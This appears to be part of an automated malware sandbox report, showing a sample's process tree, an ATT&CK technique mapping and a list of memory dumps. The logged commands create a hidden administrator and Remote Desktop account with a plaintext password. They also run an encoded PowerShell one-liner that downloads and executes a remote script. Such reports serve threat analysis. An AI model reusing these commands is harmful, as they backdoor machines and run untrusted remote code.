- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
    3⤵
    PID:2520

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc m1hgOfxo /add
1⤵
PID:2516
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc m1hgOfxo /add
  2⤵
  PID:1356
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc m1hgOfxo /add
    3⤵
    PID:1132

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
1⤵
PID:2060
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  2⤵
  PID:4108
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    3⤵
    PID:4816

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" JDQPXOPR$ /ADD
1⤵
PID:1476
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" JDQPXOPR$ /ADD
  2⤵
  PID:3936
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" JDQPXOPR$ /ADD
    3⤵
    PID:4020

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
1⤵
PID:4748
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
  2⤵
  PID:4468
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
    3⤵
    PID:3716

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc m1hgOfxo
1⤵
PID:3828
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc m1hgOfxo
  2⤵
  PID:2920
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc m1hgOfxo
    3⤵
    PID:3920

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
PID:2180
- C:\Windows\System32\Wbem\WMIC.exe
  wmic path win32_VideoController get name
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4856

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:4920
- C:\Windows\System32\Wbem\WMIC.exe
  wmic CPU get NAME
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4872

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:3928
- C:\Windows\system32\cmd.exe
  cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  2⤵
  PID:2772
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    3⤵
    - Blocklisted process makes network request
    - Drops file in Program Files directory
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3512

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Account Manipulation

T1098

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Account Manipulation

T1098

Discovery

Lateral Movement

Remote Desktop Protocol

T1076

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/932-166-0x000001E743503000-0x000001E743505000-memory.dmp

Filesize
8KB

Download
memory/932-167-0x000001E743506000-0x000001E743508000-memory.dmp

Filesize
8KB

Download
memory/932-165-0x000001E743500000-0x000001E743502000-memory.dmp

Filesize
8KB

Download
memory/932-164-0x00007FF8198E3000-0x00007FF8198E5000-memory.dmp

Filesize
8KB

Download
memory/1028-149-0x00000152301C0000-0x00000152301C4000-memory.dmp

Filesize
16KB

Download
memory/1684-155-0x000002722F316000-0x000002722F318000-memory.dmp

Filesize
8KB

Download
memory/1684-156-0x000002722F318000-0x000002722F319000-memory.dmp

Filesize
4KB

Download
memory/1684-159-0x0000027248300000-0x000002724850A000-memory.dmp

Filesize
2.0MB

Download
memory/1684-150-0x00007FF8198E3000-0x00007FF8198E5000-memory.dmp

Filesize
8KB

Download
memory/1684-151-0x000002722F310000-0x000002722F312000-memory.dmp

Filesize
8KB

Download
memory/1684-152-0x000002722F313000-0x000002722F315000-memory.dmp

Filesize
8KB

Download
memory/1684-153-0x0000027247870000-0x0000027247892000-memory.dmp

Filesize
136KB

Download
memory/1684-158-0x0000027247F70000-0x00000272480E6000-memory.dmp

Filesize
1.5MB

Download
memory/2124-143-0x0000019B80513000-0x0000019B80515000-memory.dmp

Filesize
8KB

Download
memory/2124-136-0x0000000000400000-0x0000000000A6B000-memory.dmp

Filesize
6.4MB

Download
memory/2124-144-0x0000019B80515000-0x0000019B80516000-memory.dmp

Filesize
4KB

Download
memory/2124-141-0x00007FF8198E3000-0x00007FF8198E5000-memory.dmp

Filesize
8KB

Download
memory/2124-145-0x0000019B80516000-0x0000019B80517000-memory.dmp

Filesize
4KB

Download
memory/2124-138-0x0000000000400000-0x0000000000A6B000-memory.dmp

Filesize
6.4MB

Download
memory/2124-142-0x0000019B80510000-0x0000019B80512000-memory.dmp

Filesize
8KB

Download
memory/3148-162-0x0000022376E43000-0x0000022376E45000-memory.dmp

Filesize
8KB

Download
memory/3148-161-0x0000022376E40000-0x0000022376E42000-memory.dmp

Filesize
8KB

Download
memory/3148-163-0x0000022376E46000-0x0000022376E48000-memory.dmp

Filesize
8KB

Download
memory/3148-160-0x00007FF8198E3000-0x00007FF8198E5000-memory.dmp

Filesize
8KB

Download
memory/3512-171-0x00007FF8198E3000-0x00007FF8198E5000-memory.dmp

Filesize
8KB

Download
memory/3512-174-0x00000137D8DB6000-0x00000137D8DB8000-memory.dmp

Filesize
8KB

Download
memory/3512-173-0x00000137D8DB3000-0x00000137D8DB5000-memory.dmp

Filesize
8KB

Download
memory/3512-172-0x00000137D8DB0000-0x00000137D8DB2000-memory.dmp

Filesize
8KB

Download
memory/4452-140-0x0000010FC6420000-0x0000010FC6430000-memory.dmp

Filesize
64KB

Download
memory/4452-139-0x0000010FC5D70000-0x0000010FC5D80000-memory.dmp

Filesize
64KB

Download
memory/4452-146-0x0000010FC8AF0000-0x0000010FC8AF4000-memory.dmp

Filesize
16KB

Download
memory/4896-135-0x000000001DAA0000-0x000000001DAA2000-memory.dmp

Filesize
8KB

Download
memory/4896-133-0x0000000000D80000-0x00000000011B6000-memory.dmp

Filesize
4.2MB

Download
memory/4896-134-0x00007FF819DD3000-0x00007FF819DD5000-memory.dmp

Filesize
8KB

Download